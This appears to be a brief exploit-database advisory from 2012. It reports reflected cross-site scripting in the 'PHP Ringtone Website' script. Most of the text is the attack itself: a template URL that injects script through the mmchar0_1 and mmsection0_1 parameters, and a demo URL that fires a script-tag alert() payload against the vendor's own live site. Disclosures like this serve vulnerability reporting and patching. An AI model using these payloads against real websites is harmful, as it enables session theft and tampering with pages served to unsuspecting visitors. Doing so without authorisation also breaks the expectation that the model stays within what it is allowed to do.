############################################################################ # # Exploit Title: PHP Ringtone Website # Date: 14/01/2012 # Author: Atmon3r # Discovered By: Atmon3r # Software Link: http://www.e-soft24.com/php-ringtone-website-p-351.html # Version: All Version # Security Risk:: Low # Tested on: GNU/Linux Ubuntu # ############################################################################ # # Exploit: # http://www.website.com/[path]/ringtones.php?mmchar0_1=[xss]&mmstart0_1=1&mmsection0_1=[xss] # ############################################################################ # # Demo: # http://www.e-soft24.com/ringtones/ringtones.php?mmchar0_1=G/"><script>alert('Xss By Atm0n3r')</script>&mmstart0_1=1&mmsection0_1=/"><script>alert('Xss By Atm0n3r')</script> # ############################################################################